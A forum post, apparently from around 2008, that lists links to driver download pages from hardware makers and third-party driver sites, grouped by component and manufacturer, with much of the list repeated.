http://www.fileden.com/files/2008/6/1/1939264/17022008%28006%29.jpg :) dont worrey is not trojan

ok let's start my first topic

i choose for u the best web site to found your driver who u looking up have fun -eng-
je choisie pour vous les meilleur adresse web pour vos driver

http://www.driverzone.com/
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://driverpacks.net/Projects/DriverPacks/
http://driversguide.com/
http://www.totallydrivers.com/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/

Direct X:
http://www.microsoft.com/windows/directx/default.aspx


Video/graphics drivers:
Nvidia:
http://www.nvidia.com/content/drivers/drivers.asp
Ageia:
http://www.ageia.com/products/drivers.html
Ati:
http://www.ati.com/support/driver.html
Tv Tuner Cards:
http://www.tv-cards.com/drivers.php

Sound Drivers:

Creative Labs Sound Blaster:
http://us.creative.com/support/downloads/


Part Manufacturer Drivers:
Hp:
http://www.hp.com/country/us/en/support.html
Xfx:
http://www.xfxforce.com/web/support/drivers.jspa
Asus:
http://support.asus.com/faq/faq.aspx
D-link:
http://support.dlink.com/downloads/
Lg:
http://www.lge.com/support/software.jsp
Cannon:
http://www.usa.canon.com/consumer/co...wnloadIndexAct
Lexmark:
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
Chaintech:
http://www.chaintechusa.com/tw/eng/Download/
Msi:
http://www.msi.com.tw/program/suppor...t_dvr_list.php
Biostar:
http://www.biostar-usa.com/downloadmain.asp
Razer:
http://www.razerpro.com/index.php?op...d=13&Itemid=27
Abit:
http://www.abit-usa.com/downloads/
Epson:
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
Mach:
http://www.machspeed.com/products.htm
Linksys:
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
Pioneer:
http://www.pioneer-eur.com/eur/conte...t/support.html
Diamond:
http://www.diamondmm.com/newarchivelicense.php
Iomega:
https://iomega-na-en.custhelp.com/cg...ci/product.php
Mitsubishi:
http://www.mitsubishi-electric.com.a...oads/index.htm
Zboard:
http://www.zboard.com/global/downloads/drivers.asp
Belkin:
http://www.belkin.com/support/download/download.asp
Samsung:
http://www.samsung.com/support/produ...oad/index.aspx
Viewsonic:
http://www.viewsonic.com/support/drivers/index.cfm
Plextor:
http://www.plextor.com/english/suppo...s/drivers.html
Liteon-It:
http://www.liteonit.com/global/index...pper&Itemid=75
Microsoft:
http://www.microsoft.com/hardware/mo.../Download.mspx
Gigabyte:
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
Logitech:
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
Voodoo:
http://www.voodoofiles.com/
Intel:
http://downloadfinder.intel.com/scri...port_intel.asp
Cisco:
http://www.cisco.com/en/US/support/index.html



Computer Manufacturer Drivers:
Dell:
http://support.dell.com/support/downloads/index.aspx
Apple (mac) :
http://www.apple.com/downloads/macosx/drivers/
Shuttle:
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
Hp:
http://www.hp.com/country/us/en/support.html
Sony:
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
E-Machines:
http://www.emachines.com/support/product_support.html
Voodoo Game Doctor:
http://www.voodoopc.com/authorization/myaccount.aspx
Alienware:
http://support.alienware.com/Support...port_Area.aspx
Acer:
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
Toshiba:
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0


Other
http://www.digg.com/software/Almost_...Hate_Searching
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html

Drivers:
http://www.driverzone.com/
http://www.nvidia.com/content/drivers/drivers.asp
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://www.microsoft.com/hardware/mo.../Download.mspx
http://www.digg.com/software/Almost_...Hate_Searching
http://driverpacks.net/Projects/DriverPacks/
http://www.ageia.com/products/drivers.html
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
www.driversguide.com
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
http://downloadfinder.intel.com/scri...port_intel.asp
http://www.hp.com/country/us/en/support.html
http://support.dlink.com/downloads/
www.totallydrivers.com
http://www.lge.com/support/software.jsp
http://www.xfxforce.com/web/support/drivers.jspa
http://support.asus.com/faq/faq.aspx
http://www.pcpitstop.com/driverscan.asp
http://www.voodoofiles.com/
http://www.usa.canon.com/consumer/co...wnloadIndexAct
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
http://www.chaintechusa.com/tw/eng/Download/
http://www.msi.com.tw/program/suppor...t_dvr_list.php
http://www.biostar-usa.com/downloadmain.asp
http://www.razerpro.com/index.php?op...d=13&Itemid=27
http://www.abit-usa.com/downloads/
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
http://www.machspeed.com/products.htm
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
http://www.pioneer-eur.com/eur/conte...t/support.html
http://www.diamondmm.com/newarchivelicense.php
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
http://www.emachines.com/support/product_support.html
https://iomega-na-en.custhelp.com/cg...ci/product.php
http://www.mitsubishi-electric.com.a...oads/index.htm
http://www.zboard.com/global/downloads/drivers.asp
http://www.belkin.com/support/download/download.asp
http://www.samsung.com/support/produ...oad/index.aspx
http://www.viewsonic.com/support/drivers/index.cfm
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
http://www.plextor.com/english/suppo...s/drivers.html
http://www.liteonit.com/global/index...pper&Itemid=75
http://www.tv-cards.com/drivers.php
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
http://www.cisco.com/en/US/support/index.html
http://support.dell.com/support/downloads/index.aspx
http://www.apple.com/downloads/macosx/drivers/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/


creative sound:
http://us.creative.com/support/downloads/

direct x home page
http://www.microsoft.com/windows/directx/default.aspx

ati driver home page
http://www.ati.com/support/driver.html
__________________
تطوير : مدونة حكمات